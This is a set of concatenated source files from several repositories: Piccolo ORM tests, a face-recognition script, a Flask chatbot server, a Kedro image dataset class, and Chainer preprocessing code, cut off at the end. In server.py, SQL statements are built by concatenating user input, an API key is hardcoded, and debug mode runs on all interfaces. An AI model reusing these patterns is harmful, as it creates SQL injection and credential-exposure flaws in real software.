"{}") self.assertEqual(row.json_list, "[]") self.assertEqual(row.json_none, None) def test_invalid_default(self): with self.assertRaises(ValueError): for value in ("a", 1, ("x", "y", "z")): JSON(default=value) class TestJSONInsert(TestCase): def setUp(self): MyTable.create_table().run_sync() def tearDown(self): MyTable.alter().drop_table().run_sync() def check_response(self): self.assertEqual( MyTable.select(MyTable.json) .first() .run_sync()["json"] .replace(" ", ""), '{"message":"original"}', ) def test_json_string(self): """ Test inserting using a string. """ row = MyTable(json='{"message": "original"}') MyTable.insert(row).run_sync() self.check_response() def test_json_object(self): """ Test inserting using an object. """ row = MyTable(json={"message": "original"}) MyTable.insert(row).run_sync() class TestJSONUpdate(TestCase): def setUp(self): MyTable.create_table().run_sync() def tearDown(self): MyTable.alter().drop_table().run_sync() def add_row(self): row = MyTable(json={"message": "original"}) row.save().run_sync() def check_response(self): self.assertEqual( MyTable.select(MyTable.json) .first() .run_sync()["json"] .replace(" ", ""), '{"message":"updated"}', ) def test_json_update_string(self): """ Test updating a JSON field using a string. """ self.add_row() MyTable.update({MyTable.json: '{"message": "updated"}'}).run_sync() self.check_response() def test_json_update_object(self): """ Test updating a JSON field using an object. """ self.add_row() MyTable.update({MyTable.json: {"message": "updated"}}).run_sync() self.check_response() ``` #### File: tests/columns/test_timestamptz.py ```python import datetime from unittest import TestCase from dateutil import tz from piccolo.columns.column_types import Timestamptz from piccolo.columns.defaults.timestamptz import ( TimestamptzCustom, TimestamptzNow, TimestamptzOffset, ) from piccolo.table import Table class MyTable(Table): created_on = Timestamptz() class MyTableDefault(Table): """ A table containing all of the possible `default` arguments for `Timestamptz`. """ created_on = Timestamptz(default=TimestamptzNow()) created_on_offset = Timestamptz(default=TimestamptzOffset(days=1)) created_on_custom = Timestamptz(default=TimestamptzCustom(year=2021)) created_on_datetime = Timestamptz( default=datetime.datetime(year=2020, month=1, day=1) ) class CustomTimezone(datetime.tzinfo): pass class TestTimestamptz(TestCase): def setUp(self): MyTable.create_table().run_sync() def tearDown(self): MyTable.alter().drop_table().run_sync() def test_timestamptz_timezone_aware(self): """ Test storing a timezone aware timestamp. """ for tzinfo in ( datetime.timezone.utc, tz.gettz("America/New_York"), ): created_on = datetime.datetime( year=2020, month=1, day=1, hour=12, minute=0, second=0, tzinfo=tzinfo, ) row = MyTable(created_on=created_on) row.save().run_sync() # Fetch it back from the database result = ( MyTable.objects() .where( MyTable._meta.primary_key == getattr(row, MyTable._meta.primary_key._meta.name) ) .first() .run_sync() ) self.assertEqual(result.created_on, created_on) # The database converts it to UTC self.assertEqual(result.created_on.tzinfo, datetime.timezone.utc) class TestTimestamptzDefault(TestCase): def setUp(self): MyTableDefault.create_table().run_sync() def tearDown(self): MyTableDefault.alter().drop_table().run_sync() def test_timestamptz_default(self): """ Make sure the default value gets created, and can be retrieved. """ created_on = datetime.datetime.now(tz=datetime.timezone.utc) row = MyTableDefault() row.save().run_sync() result = MyTableDefault.objects().first().run_sync() delta = result.created_on - created_on self.assertTrue(delta < datetime.timedelta(seconds=1)) self.assertEqual(result.created_on.tzinfo, datetime.timezone.utc) ``` #### File: music/piccolo_migrations/2021-07-25T22-38-48-009306.py ```python from enum import Enum from piccolo.apps.migrations.auto import MigrationManager from piccolo.columns.column_types import JSON, JSONB, Varchar from piccolo.columns.indexes import IndexMethod ID = "2021-07-25T22:38:48:009306" VERSION = "0.26.0" async def forwards(): manager = MigrationManager(migration_id=ID, app_name="music") manager.add_table("Shirt", tablename="shirt") manager.add_table("RecordingStudio", tablename="recording_studio") manager.add_column( table_class_name="Shirt", tablename="shirt", column_name="size", column_class_name="Varchar", column_class=Varchar, params={ "length": 1, "default": "l", "null": False, "primary": False, "key": False, "unique": False, "index": False, "index_method": IndexMethod.btree, "choices": Enum( "Size", {"small": "s", "medium": "m", "large": "l"} ), }, ) manager.add_column( table_class_name="RecordingStudio", tablename="recording_studio", column_name="facilities", column_class_name="JSON", column_class=JSON, params={ "default": "{}", "null": False, "primary": False, "key": False, "unique": False, "index": False, "index_method": IndexMethod.btree, "choices": None, }, ) manager.add_column( table_class_name="RecordingStudio", tablename="recording_studio", column_name="facilities_b", column_class_name="JSONB", column_class=JSONB, params={ "default": "{}", "null": False, "primary": False, "key": False, "unique": False, "index": False, "index_method": IndexMethod.btree, "choices": None, }, ) return manager ``` #### File: table/instance/test_get_related_readable.py ```python from tests.base import DBTestCase from tests.example_apps.music.tables import Band class TestGetRelatedReadable(DBTestCase): def test_get_related_readable(self): """ Make sure you can get the `Readable` representation for related object from another object instance. """ self.insert_row() response = Band.select( Band.name, Band._get_related_readable(Band.manager) ).run_sync() self.assertEqual( response, [{"name": "Pythonistas", "manager_readable": "Guido"}] ) # TODO Need to make sure it can go two levels deep ... # e.g. Concert._get_related_readable(Concert.band_1.manager) ``` #### File: tests/table/test_count.py ```python from tests.example_apps.music.tables import Band from ..base import DBTestCase class TestCount(DBTestCase): def test_exists(self): self.insert_rows() response = Band.count().where(Band.name == "Pythonistas").run_sync() self.assertTrue(response == 1) ``` #### File: tests/table/test_metaclass.py ```python from unittest import TestCase from piccolo.columns import Secret from piccolo.columns.column_types import JSON, JSONB, ForeignKey from piccolo.table import Table from tests.example_apps.music.tables import Band class TestMetaClass(TestCase): def test_tablename(self): self.assertEqual(Band._meta.tablename, "band") def test_protected_table_names(self): """ Some tablenames are forbidden because they're reserved words in the database, and can potentially cause issues. """ with self.assertRaises(ValueError): class User(Table): pass with self.assertRaises(ValueError): class MyUser(Table, tablename="user"): pass def test_help_text(self): """ Make sure help_text can be set for the Table. """ help_text = "The manager of a band." class Manager(Table, help_text=help_text): pass self.assertEqual(Manager._meta.help_text, help_text) def test_foreign_key_columns(self): """ Make sure TableMeta.foreign_keys and TableMeta.foreign_key_references are setup correctly. """ class TableA(Table): pass class TableB(Table): table_a = ForeignKey(references=TableA) self.assertEqual(TableB._meta.foreign_key_columns, [TableB.table_a]) self.assertEqual(TableA._meta.foreign_key_references, [TableB.table_a]) def test_secret_columns(self): """ Make sure TableMeta.secret_columns are setup correctly. """ class Classified(Table): top_secret = Secret() self.assertEqual( Classified._meta.secret_columns, [Classified.top_secret] ) def test_json_columns(self): """ Make sure TableMeta.json_columns are setup correctly. """ class MyTable(Table): column_a = JSON() column_b = JSONB() self.assertEqual( MyTable._meta.json_columns, [MyTable.column_a, MyTable.column_b] ) def test_id_column(self): """ Makes sure an id column is added. """ class TableA(Table): pass self.assertTrue(hasattr(TableA, "id")) ``` #### File: piccolo/tests/test_main.py ```python from unittest import TestCase from piccolo.main import main class TestMain(TestCase): def test_main(self): # Just make sure it runs without raising any errors. main() ``` #### File: tests/utils/test_lazy_loader.py ```python from unittest import TestCase, mock from piccolo.utils.lazy_loader import LazyLoader from tests.base import postgres_only, sqlite_only class TestLazyLoader(TestCase): def test_lazy_loading_database_driver(self): _ = LazyLoader("asyncpg", globals(), "asyncpg") @postgres_only def test_lazy_loader_asyncpg_exception(self): lazy_loader = LazyLoader("asyncpg", globals(), "asyncpg.connect") with mock.patch("asyncpg.connect") as module: module.side_effect = ModuleNotFoundError() with self.assertRaises(ModuleNotFoundError): lazy_loader._load() @sqlite_only def test_lazy_loader_aiosqlite_exception(self): lazy_loader = LazyLoader("aiosqlite", globals(), "aiosqlite.connect") with mock.patch("aiosqlite.connect") as module: module.side_effect = ModuleNotFoundError() with self.assertRaises(ModuleNotFoundError): lazy_loader._load() ```
{ "source": "0Shark/SindiAIDev", "score": 3 }
#### File: 0Shark/SindiAIDev/face_recon.py ```python import face_recognition import cv2 import numpy as np def webcam_detection(known_image, display_name): # Get a reference to webcam #0 (the default one) video_capture = cv2.VideoCapture(0) # Load a sample picture and learn how to recognize it. known_face_encoding = face_recognition.face_encodings(known_image)[0] # Create arrays of known face encodings and their names known_face_encodings = [ known_face_encoding ] known_face_names = [ display_name ] # Initialize some variables face_locations = [] face_encodings = [] face_names = [] process_this_frame = True while True: # Grab a single frame of video ret, frame = video_capture.read() # Resize frame of video to 1/4 size for faster face recognition processing small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25) # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses) rgb_small_frame = small_frame[:, :, ::-1] # Only process every other frame of video to save time if process_this_frame: # Find all the faces and face encodings in the current frame of video face_locations = face_recognition.face_locations(rgb_small_frame) face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations) face_names = [] for face_encoding in face_encodings: # See if the face is a match for the known face(s) matches = face_recognition.compare_faces(known_face_encodings, face_encoding) name = "Unknown user" # # If a match was found in known_face_encodings, just use the first one. # if True in matches: # first_match_index = matches.index(True) # name = known_face_names[first_match_index] # Or instead, use the known face with the smallest distance to the new face face_distances = face_recognition.face_distance(known_face_encodings, face_encoding) best_match_index = np.argmin(face_distances) if matches[best_match_index]: name = known_face_names[best_match_index] return True face_names.append(name) process_this_frame = not process_this_frame # Display the resulting image # cv2.imshow('SindiAI-Detector', frame) # Hit 'q' on the keyboard to quit! if cv2.waitKey(1) & 0xFF == ord('q'): break video_capture.release() cv2.destroyAllWindows() ``` #### File: 0Shark/SindiAIDev/server.py ```python from flask import Flask, render_template, request import pymysql import utils from pyowm import OWM # OpenWeather weatherAPI_token = "44edc82d5c54a7d0cd68aec1904e810e" mgr = OWM(weatherAPI_token) # initializing variables s = 0 q = 0 facehash = "" app = Flask(__name__) def insert_sql(user_input): # inserting user inputs, bot outputs and time into database global s global facehash s = s + 1 # ID resp = utils.giveInput(user_input, facehash) resp = str(resp) try: sql = 'INSERT INTO user_bot_chat (id, User_input, Bot_output) VALUES("' + str( s) + '","' + user_input + '","' + resp + '");' a.execute(sql) conn.commit() except Exception as e: print("Line 27") print("Exeception occured:{}".format(e)) def user_list(): # extracting user inputs from user_bot_chat database user = [] sql = 'select User_input from user_bot_chat;' a.execute(sql) w_user = list(a.fetchall()) for i in w_user: # user.append('You: ' + i[0]) user.append(i[0]) return user def bot_list(): # extracting bot responses from user_bot_chat database bot = [] sql = 'select Bot_output from user_bot_chat;' a.execute(sql) w_bot = list(a.fetchall()) for i in w_bot: # bot.append('Sindi' + i[0]) bot.append(i[0]) return bot @app.route('/home') # links to the first page - index.html def index(): weather = getWeather() return render_template("index.html", user_input=r(), temp=weather[0], location=weather[1], icon=weather[2], humidity=weather[3], wind=weather[4], music=utils.music_playing()) @app.route('/') # links to the first page - index.html def home(): return render_template("setup.html") @app.route('/setup', methods=['POST']) def setup(): weather = getWeather() global facehash facehash= request.form["facehash"] return render_template("index.html", user_input=r(), temp=weather[0], location=weather[1], icon=weather[2], humidity=weather[3], wind=weather[4], music=utils.music_playing()) @app.route('/clear') def clearChat(): weather = getWeather() # Clear all table rows sql = "TRUNCATE TABLE user_bot_chat;" a.execute(sql) return render_template("index.html", user_input=r(), temp=weather[0], location=weather[1], icon=weather[2], humidity=weather[3], wind=weather[4], music=utils.music_playing()) def r(): # takes user inputs and bot outputs and insert into a array to later send to html file try: user_input = request.form["user_input"] insert_sql(user_input) r = [] user = user_list() bot = bot_list() for j in range(0, len(user)): r.append(user[j]) r.append(bot[j]) return r except: r = [] user = user_list() bot = bot_list() for j in range(0, len(user)): r.append(user[j]) r.append(bot[j]) return r def getWeather(): observation = mgr.weather_at_place('Tirana') w = observation.get_weather() wind_data = w.get_wind() humidity = w.get_humidity() temp_data = w.get_temperature('celsius') icon = w.get_weather_icon_name() weatherData = [str(int(temp_data['temp'])), 'Tirana', str(icon), str(int(humidity)), str(int(wind_data['speed']))] return weatherData @app.route('/process', methods=['POST']) def process(): weather = getWeather() # called when user input is given and submit button is pressed return render_template("index.html", user_input=r(), temp=weather[0], location=weather[1], icon=weather[2], humidity=weather[3], wind=weather[4], music=utils.music_playing()) if __name__ == '__main__': try: # connects to the database conn = pymysql.connect(host='localhost', user='root', password='', db='sindi_db') a = conn.cursor() except Exception as e: print("QUERY ERROR: Connection") print("Exeception occured:{}".format(e)) app.run(host='0.0.0.0', port=int('8000'), debug=True) # 0.0.0.0.,80 # conn.close() # a.close() ```
{ "source": "0shimax/backtest-example", "score": 3 }
#### File: datasets/image/image_dataset.py ```python from pathlib import PurePosixPath from typing import Any, Dict import fsspec import numpy as np from PIL import Image from kedro.io import AbstractDataSet from kedro.io.core import get_filepath_str, get_protocol_and_path class ImageDataSet(AbstractDataSet): """``ImageDataSet`` loads / save image data from a given filepath as `numpy` array using Pillow. ref: https://kedro.readthedocs.io/en/stable/07_extend_kedro/03_custom_datasets.html Example: :: >>> ImageDataSet(filepath='/img/file/path.png') """ def __init__(self, filepath: str): """Creates a new instance of ImageDataSet to load / save image data for given filepath. Args: filepath: The location of the image file to load / save data. """ protocol, path = get_protocol_and_path(filepath) self._protocol = protocol self._filepath = PurePosixPath(path) self._fs = fsspec.filesystem(self._protocol) def _load(self) -> np.ndarray: """Loads data from the image file. Returns: Data from the image file as a numpy array """ load_path = get_filepath_str(self._filepath, self._protocol) with self._fs.open(load_path, mode="r") as f: image = Image.open(f).convert("RGBA") return np.asarray(image) def _save(self, data: np.ndarray) -> None: """Saves image data to the specified filepath.""" save_path = get_filepath_str(self._filepath, self._protocol) with self._fs.open(save_path, mode="wb") as f: image = Image.fromarray(data) image.save(f) def _describe(self) -> Dict[str, Any]: """Returns a dict that describes the attributes of the dataset.""" return dict(filepath=self._filepath, protocol=self._protocol) ```
{ "source": "0shimax/chainer-feedbacknet", "score": 2 }
#### File: common/image_processor/mini_batch_loader.py ```python import os, sys sys.path.append('./src/common/image_processor') sys.path.append('./src/common/text_processor') sys.path.append('./src/common/image_processor/feature_extractor') import chainer import cv2 import numpy as np np.random.seed(555) from contextlib import ExitStack import numbers from image_normalizer import ImageNormalizer from tokenizer import Tokenizer from feature_extractor_utils import show_image from cell_diameters import compute_cell_diameter from nucleus_diamiters import compute_nucleus_diameter class DatasetPreProcessor(chainer.dataset.DatasetMixin): def __init__(self, args): """args type is EasyDict class """ labels = list('ABCDEFGHIJKLMNOPQRS') self.label2clsval = {l:i for i,l in enumerate(labels)} self.args = args self.gray = args.converse_gray self.image_normalizer = ImageNormalizer() self.pairs = self.read_paths() self.counter = 0 self.image_size_in_batch = [None, None] # height, width if args.generate_comment: self.inputs_tokens = self.compute_token_ids() # return numpy array def __len__(self): return len(self.pairs) def read_paths(self): path_label_pairs = [] for image_path, label in self.path_label_pair_generator(): if not label.isdigit() and not label=='-1': label = self.label2clsval[label] path_label_pairs.append((image_path, label)) return path_label_pairs def path_label_pair_generator(self): with ExitStack () as stack: f_image = stack.enter_context(open(self.args.image_pointer_path, 'r')) f_label = stack.enter_context(open(self.args.labels_file_path, 'r')) for image_file_name, label in zip(f_image, f_label): image_file_name = image_file_name.rstrip() image_full_path = os.path.join(self.args.image_dir_path, image_file_name) if os.path.isfile(image_full_path): yield image_full_path, label.rstrip() else: raise RuntimeError("file is not fined: {}.".format(image_full_path)) def __init_batch_counter(self): if self.args.train and self.counter==self.args.training_params.batch_size: self.counter = 0 self.image_size_in_batch = [None, None] def __set_image_size_in_batch(self, image): if self.counter==1: resized_h, resized_w = image.shape[:2] self.image_size_in_batch = [resized_h, resized_w] def get_example(self, index): self.counter += 1 if self.args.debug_mode: if self.counter>15: assert False, 'stop test' path, label = self.pairs[index] image = cv2.imread(path) src_image = image.copy() if self.args.debug_mode: show_image(image) # cv2.imwrite("/Users/naoki_shimada/Downloads/Origin.jpg", image) # gray transform if converse_gray is True image = self.color_trancefer(image) h, w, ch = image.shape if image is None: raise RuntimeError("invalid image: {}".format(path)) # resizing image if self.args.do_resize: if self.counter>1: # augmentas is ordered w,h in resize method of openCV scale = self.image_size_in_batch[1]/w, self.image_size_in_batch[0]/h image = self.resize_image(image, scale) else: image = self.resize_image(image) elif self.args.crop_params.flag: image = self.crop_image(image) # augmentat image if self.args.aug_params.do_augment: image = self.augment_image(image) if self.args.debug_mode: u_image = image.astype(np.uint8) show_image(u_image) cv2.imwrite("/Users/naoki_shimada/Downloads/{}".format(os.path.basename(path)), u_image) print(image.shape) print('label:', label) # assert False, 'terminate' # store image size # because dimension must be equeal per batch self.__set_image_size_in_batch(image) # image normalize image = getattr(self.image_normalizer, \ self.args.im_norm_type.method)(image, self.args.im_norm_type.opts) if self.args.debug_mode: u_image = image.astype(np.uint8) show_image(u_image) # cv2.imwrite("/Users/naoki_shimada/Downloads/GCN.jpg", show_image) print(image.shape) print('label:', label) # assert False, 'terminate' if self.args.detect_edge: edges = self.detect_edge(image) if self.args.debug_mode: u_image = edges.reshape(edges.shape[0], edges.shape[1]).astype(np.uint8) show_image(u_image) image = cv2.merge((image, edges)) # transpose for chainer image = image.transpose(2, 0, 1) # initialize batch counter self.__init_batch_counter() batch_inputs = image.astype(np.float32), np.array(label, dtype=np.int32) if self.args.with_feature_val: cell_diameter = \ compute_cell_diameter(src_image, debug=self.args.debug_mode) min_nucleus_diameter, max_nucleus_diameter = \ compute_nucleus_diameter(src_image, debug=self.args.debug_mode) features = np.array( \ [cell_diameter, min_nucleus_diameter, max_nucleus_diameter], dtype=np.float32) batch_inputs += (features, ) if self.args.generate_comment: batch_inputs += (self.inputs_tokens[index], ) return batch_inputs def color_trancefer(self, image): h, w, _ = image.shape if self.args.converse_gray: image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY).reshape((h,w,1)) else: image = image.astype(np.float32) return image def augment_image(self, image): if self.args.aug_params.params.do_scale and self.counter==1: image = self.scaling(image) if self.args.aug_params.params.do_flip: image = self.flip(image) if self.args.aug_params.params.change_britghtness: image = self.random_brightness(image) if self.args.aug_params.params.change_contrast: image = self.random_contrast(image) if self.args.aug_params.params.do_rotate: image = self.rotate_image(image) if self.args.aug_params.params.do_shift: image = self.shift_image(image) if self.args.aug_params.params.do_blur: image = self.random_blur(image) return image def resize_image(self, image, scale=None): xh, xw = image.shape[:2] if scale is None: # if scale is not difinded, calculate scale as closest multiple number. h_scale = (xh//self.args.multiple)*self.args.multiple/xh w_scale = (xw//self.args.multiple)*self.args.multiple/xw scale = w_scale, h_scale elif isinstance(scale, numbers.Number): scale = scale, scale elif isinstance(scale, tuple) and len(scale)>2: raise RuntimeError("Error occurred with variable ot scale in resize_image method") new_sz = (int(xw*scale[0])+1, int(xh*scale[1])+1) # specification of opencv, argments is recepted (w, h) image = cv2.resize(image, new_sz) xh, xw = image.shape[:2] m0, m1 = xh % self.args.multiple, xw % self.args.multiple d0, d1 = np.random.randint(m0+1), np.random.randint(m1+1) image = image[d0:(image.shape[0] - m0 + d0), d1:(image.shape[1] - m1 + d1)] if len(image.shape)==2: return image.reshape((image.shape[0], image.shape[1], 1)) else: return image def flip(self, image): do_flip_xy = np.random.randint(0, 2) do_flip_x = np.random.randint(0, 2) do_flip_y = np.random.randint(0, 2) if do_flip_xy: # Transpose X and Y axis image = image[::-1, ::-1, :] elif do_flip_x: # Flip along Y-axis image = image[::-1, :, :] elif do_flip_y: # Flip along X-axis image = image[:, ::-1, :] return image def scaling(self, image): do_scale = np.random.randint(0, 2) if do_scale: scale = self.args.aug_params.params.scale[ \ np.random.randint(0,len(self.args.aug_params.params.scale))] return self.resize_image(image, scale) else: return image def random_brightness(self, image, lower=0.2, upper=2.0, seed=None): brightness_flag = np.random.randint(0, 2) if brightness_flag: h, w, ch = image.shape gamma = np.random.uniform(lower, upper) image = 255 * np.power(image, 1.0/gamma)*255**(-1.0/gamma) return self.__reshpe_channel(image, (h,w,ch)) else: return image def random_contrast(self, image, lower=1.0, upper=20.0, seed=None): def __change(one_channel): f = np.random.uniform(lower, upper) return 255.0/(1+np.exp(-f*(one_channel-128)/255)) # mean = one_channel.mean() # max_val = one_channel.max() # return max_val/(1+np.exp(-f*(one_channel-mean)/max_val)) # return (one_channel - mean) * f + mean contrast_flag = np.random.randint(0, 2) if contrast_flag: h, w, ch = image.shape image = cv2.merge(tuple(__change(d_ch) for d_ch in cv2.split(image))) return self.__reshpe_channel(image, (h,w,ch)) else: return image def shift_image(self, image): do_shift_xy = np.random.randint(0, 2) do_shift_x = np.random.randint(0, 2) do_shift_y = np.random.randint(0, 2) if do_shift_xy: lr_shift = self.args.aug_params.params.lr_shift[ \ np.random.randint(0,len(self.args.aug_params.params.lr_shift))] ud_shift = self.args.aug_params.params.ud_shift[ \ np.random.randint(0,len(self.args.aug_params.params.ud_shift))] elif do_shift_y: lr_shift = 0 ud_shift = self.args.aug_params.params.ud_shift[ \ np.random.randint(0,len(self.args.aug_params.params.ud_shift))] elif do_shift_x: lr_shift = self.args.aug_params.params.lr_shift[ \ np.random.randint(0,len(self.args.aug_params.params.lr_shift))] ud_shift = 0 if do_shift_xy or do_shift_y or do_shift_y: h, w, ch = image.shape affine_matrix = np.float32([[1,0,lr_shift],[0,1,ud_shift]]) # 横、縦 image = cv2.warpAffine(image, affine_matrix, (w,h)) return self.__reshpe_channel(image, (h,w,ch)) else: return image def rotate_image(self, image): do_rotate = np.random.randint(0, 2) if do_rotate: h, w, ch = image.shape rotation_angle = self.args.aug_params.params.rotation_angle[ \ np.random.randint(0,len(self.args.aug_params.params.rotation_angle))] affine_matrix = cv2.getRotationMatrix2D((h/2, w/2), rotation_angle, 1) image = cv2.warpAffine(image, affine_matrix, (w,h)) return self.__reshpe_channel(image, (h,w,ch)) else: return image def random_blur(self, image, average_square=None): do_blur = np.random.randint(0, 2) if do_blur: h, w, ch = image.shape # the larger the number, the blurred. # original: (25, 25) average_square = (10, 10) if average_square is None else average_square # calculate moving average and output image = cv2.blur(image, average_square) return self.__reshpe_channel(image, (h,w,ch)) else: return image def crop_image(self, image): h, w, ch = image.shape top = int((w-self.args.crop_params.size)/2) left = int((h-self.args.crop_params.size)/2) return image[left:left+self.args.crop_params.size,top:top+self.args.crop_params.size,:] def __reshpe_channel(self, image, im_shape ): if len(image.shape)==2: return image.reshape(im_shape) else: return image def compute_token_ids(self): parser = Tokenizer(self.args.token_args) return parser.token2id() def detect_edge(self, image): h, w, ch = image.shape # to gray if ch==3: gray_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY).reshape((h,w,1)) else: gray_img = image # edge images respectively return cv2.Canny(gray_img, 32, 64) # (50, 110), (128, 128) ```
{ "source": "0shimax/chainer-learning-to-remember-rare-events", "score": 2 }
#### File: evaluator/visualizer/attention_visualizer.py ```python import sys, os sys.path.append('./src/common') sys.path.append('./src/common/image_processor') sys.path.append('./src/net') sys.path.append('./experiment_settings') from mini_batch_loader import DatasetPreProcessor from visualization_settings import get_args from trainer_utils import EasyTrainer import chainer from chainer import Variable, cuda import numpy as np import cv2 from itertools import product from math import ceil, floor class AttentionVisualizer(object): """ see OBJECT DETECTORS EMERGE IN DEEP SCENE CNNs, Zhou+, '15 https://arxiv.org/abs/1412.6856 """ def __init__(self, args): self.args = args self.xp = cuda.cupy if args.gpu>=0 else np if args.size < 32: raise ValueError( \ 'args.size is must be more than 32 for pyramid spacial pooling.') def calculate_slice_idxs(self, size, x, y, h, w): patch_harf_slide = ceil(size/2) sl_strt_x = int(max(0, x - patch_harf_slide)) sl_end_x = int(min(h, x - patch_harf_slide + size)) sl_strt_y = int(max(0, y - patch_harf_slide)) sl_end_y = int(min(w, y - patch_harf_slide + size)) return sl_strt_x, sl_end_x, sl_strt_y, sl_end_y def calculate_target_class(self, y, gt): if self.args.view_type=='gt': prob = y[0, gt] target_class = gt elif self.args.view_type=='infer': max_class_idx = int(self.xp.argmax(y[0, :])) prob = y[0, max_class_idx] target_class = max_class_idx return prob, target_class, def crop_patches(self, image): ''' occluded images is so time consuming. create image patches instead of occluded images. thus, score need to be reversed. do not forget. ''' n_img, ch, h, w = image.shape num_occluded_img = \ ((h - 1)//self.args.stride+1) * ((w - 1)//self.args.stride+1) patches = self.xp.zeros( \ (num_occluded_img, ch, self.args.size, self.args.size), \ dtype=np.float32) window_pos = [] idx = 0 for x, y in product(range(self.args.size//2, h, self.args.stride), \ range(self.args.size//2, w, self.args.stride)): _img = image.copy() sl_strt_x, sl_end_x, sl_strt_y, sl_end_y = \ self.calculate_slice_idxs(self.args.size, x, y, h, w) patch = image[:, :, sl_strt_x:sl_end_x, sl_strt_y:sl_end_y] if min(patch.shape[2:])<self.args.size: continue patches[idx] = patch window_pos.append([x, y]) idx += 1 window_pos = self.xp.array(window_pos, dtype=np.int32) return patches[:idx], window_pos def compute_one_batch_mask( \ self, mask, patches, prob, target_class, w_pos, idx): n_img, ch, h, w = mask.shape x_batch = Variable(patches[idx:idx+self.args.patch_batchsize]) self.args.net(x_batch, self.xp.array( \ [target_class]*len(x_batch.data), np.int32)) y_batch = self.args.net.prob.data patches_prob = y_batch[:, target_class] # attention score diff = patches_prob - prob if self.args.gpu>=0: threshold = np.percentile(self.xp.asnumpy(diff), self.args.percentile) else: threshold = self.xp.percentile(diff, self.args.percentile) batch_w_pos = w_pos[idx:idx+self.args.patch_batchsize] crux_coordinate = self.xp.array([batch_w_pos[idx] for idx, flag in \ enumerate(diff > threshold) if flag], dtype=np.float32) for x, y in crux_coordinate: sl_strt_x, sl_end_x, sl_strt_y, sl_end_y = \ self.calculate_slice_idxs(self.args.size, x, y, h, w) mask[:, :, sl_strt_x:sl_end_x, sl_strt_y:sl_end_y] = 1. return mask def compute_attention_mask(self, image, gt): ''' create mask without attention. image : (3, height, width) gt : integer percentile: degree of interest ''' ch, h, w = image.shape image = image.reshape(1, ch, h, w).astype(np.float32) if self.args.gpu >= 0: image = cuda.to_gpu(image, device=self.args.gpu) x = Variable(image) self.args.net(x, self.xp.array([gt], np.int32)) y = self.args.net.prob.data prob, target_class = self.calculate_target_class(y, gt) patches, w_pos = self.crop_patches(image) if self.args.gpu>=0: patches = cuda.to_gpu(patches, device=self.args.gpu) mask = self.xp.zeros_like(image) for idx in range(0, len(patches), self.args.patch_batchsize): mask = self.compute_one_batch_mask( \ mask, patches, prob, target_class, w_pos, idx) return mask, target_class def visualize_attention(self, raw_image, preprocessed_image, gt): ''' gt : integer percentile: degree of interest ''' h, w, _ = raw_image.shape mask, target_class = \ self.compute_attention_mask(preprocessed_image, gt) mask = mask[0].transpose(1,2,0).astype(np.uint8) xp = cuda.get_array_module(mask) if xp!=np: mask = self.xp.asnumpy(mask) mask = cv2.resize(mask, (w, h)) return raw_image * mask, target_class if __name__=='__main__': args = get_args() mini_batch_loader = DatasetPreProcessor(args) visualizer = AttentionVisualizer(args) _, model_eval = EasyTrainer.prepare_model(args) args.net = model_eval for idx, (image_path, label) in enumerate(mini_batch_loader.pairs): raw_image = cv2.imread(image_path) preprocessed_image, _ = mini_batch_loader.get_example(idx) attention_view, target_class = \ visualizer.visualize_attention(raw_image, preprocessed_image, label) name, extension = os.path.basename(image_path).split('.') image_fname = name+'_'+str(label)+'_'+str(target_class)+'.'+extension output_path = os.path.join(args.output_path, 'visualized_attention_images') if not os.path.exists(output_path): print("create directory:", output_path) os.mkdir(output_path) output_path = os.path.join(output_path, image_fname) cv2.imwrite(output_path, attention_view) ``` #### File: src/common/trainer_utils.py ```python import sys, os sys.path.append('./src/common') sys.path.append('./src/common/image_processor') sys.path.append('./src/net') sys.path.append('./src/net/RAM') sys.path.append('./src/net/caption_generator') sys.path.append('./src/net/feedback') sys.path.append('./experiment_settings') from mini_batch_loader import DatasetPreProcessor from important_serial_iterator import ImportantSerialIterator from copy_model import copy_model import chainer import chainer.functions as F from chainer import serializers from chainer import cuda, Variable from chainer import Reporter, report, report_scope from chainer import optimizers, serializers, training from chainer.training import extensions import importlib class EasyTrainer(object): def __init__(self, args, settings_type): self.args = args self.settings_type = settings_type @staticmethod def prepare_model(args): model = getattr( importlib.import_module(args.archtecture.module_name), \ args.archtecture.class_name) \ (args.n_class, args.in_ch) if os.path.exists(args.initial_model): print('Load model from', args.initial_model, file=sys.stderr) serializers.load_npz(args.initial_model, model) if args.gpu >= 0: chainer.cuda.get_device(args.gpu).use() model.to_gpu() model.train = True model.n_class = args.n_class m_eval = model.copy() m_eval.train = False model.active_learn = args.active_learn return model, m_eval def select_optimizer(self): if self.args.training_params.optimizer=='RMSpropGraves': return chainer.optimizers.RMSpropGraves(self.args.training_params.lr) elif self.args.training_params.optimizer=='Adam': return chainer.optimizers.Adam() elif self.args.training_params.optimizer=='AdaDelta': return chainer.optimizers.AdaDelta() elif self.args.training_params.optimizer=='NesterovAG': return chainer.optimizers.NesterovAG(self.args.training_params.lr) elif self.args.training_params.optimizer=='MomentumSGD': return chainer.optimizers.MomentumSGD(self.args.training_params.lr) def prepare_optimizer(self, model): optimizer = self.select_optimizer() optimizer.setup(model) # print("optimizer.target.params()") # print(optimizer.target.__dict__) # optimizer.target.__dict__ = {k: v for k, v in optimizer.target.__dict__.items() if "memory_" not in k} # print(optimizer.target.__dict__) # optimizer.target._params = (param for param in optimizer.target.params() if "memory_" not in param.name) # print([param for param in optimizer.target.params()]) if self.args.training_params.weight_decay: optimizer.add_hook(chainer.optimizer.WeightDecay( \ self.args.training_params.weight_decay)) if self.args.training_params.lasso: optimizer.add_hook(chainer.optimizer.Lasso( \ self.args.training_params.weight_decay)) if self.args.training_params.clip_grad: optimizer.add_hook(chainer.optimizer.GradientClipping( \ self.args.training_params.clip_value)) return optimizer def prepare_dataset(self): mode_settings = importlib.import_module(self.settings_type) train_args = mode_settings.get_args('train') # load dataset if chainer.config.user_data_set=='mnist': train_mini_batch_loader, test_mini_batch_loader = \ chainer.datasets.get_mnist() else: train_mini_batch_loader = DatasetPreProcessor(train_args) test_mini_batch_loader = DatasetPreProcessor(get_args('test')) if train_args.importance_sampling: print("importance----------") train_it = ImportantSerialIterator( \ train_mini_batch_loader, \ train_args.training_params.batch_size, \ shuffle=train_args.shuffle, \ p=np.loadtxt(train_args.weights_file_path)) else: if train_args.training_params.iter_type=='multi': iterator = chainer.iterators.MultiprocessIterator else: iterator = chainer.iterators.SerialIterator train_it = iterator( \ 